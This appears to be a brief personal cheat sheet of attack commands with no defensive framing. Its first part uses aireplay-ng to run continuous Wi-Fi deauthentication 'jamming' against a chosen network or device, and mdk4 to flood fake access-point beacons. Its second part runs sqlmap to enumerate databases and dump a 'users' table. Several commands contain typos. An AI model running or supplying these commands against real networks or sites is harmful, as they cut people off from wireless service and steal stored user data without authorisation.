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Wifi Jammer Attack:

#airmon-ng start wlan0

#airodump-ng wlan0mon
#airodump-ng -c 8 --bssid BC:8A:E8:16:66:C2 waln0mon
now we do denial attack
#aireplay-ng -0 0 -a bssid wlan0mon
OR for particular one device
#aireplay-ng -0 0 -a bssid -c [target station] wlan0mon
here i give 0 not 10 or 100 because it continuous de-authentication

Beacon flooding (many random access point show)

mdk4 wlan0mon b -a -w nta -m
if u want to that many rondom access point show with particular names
then create leafpad test.list and type some name
mdk4s wlan0mon b -f test.list

#sqlmap -u ‘’ --batch

#sqlmap -u ‘’ --batch --dbs
#sqlmap -u ‘’ --batch -D acuart –
#sqlmap -u ‘’ --batch -D acuart -T
users --dump

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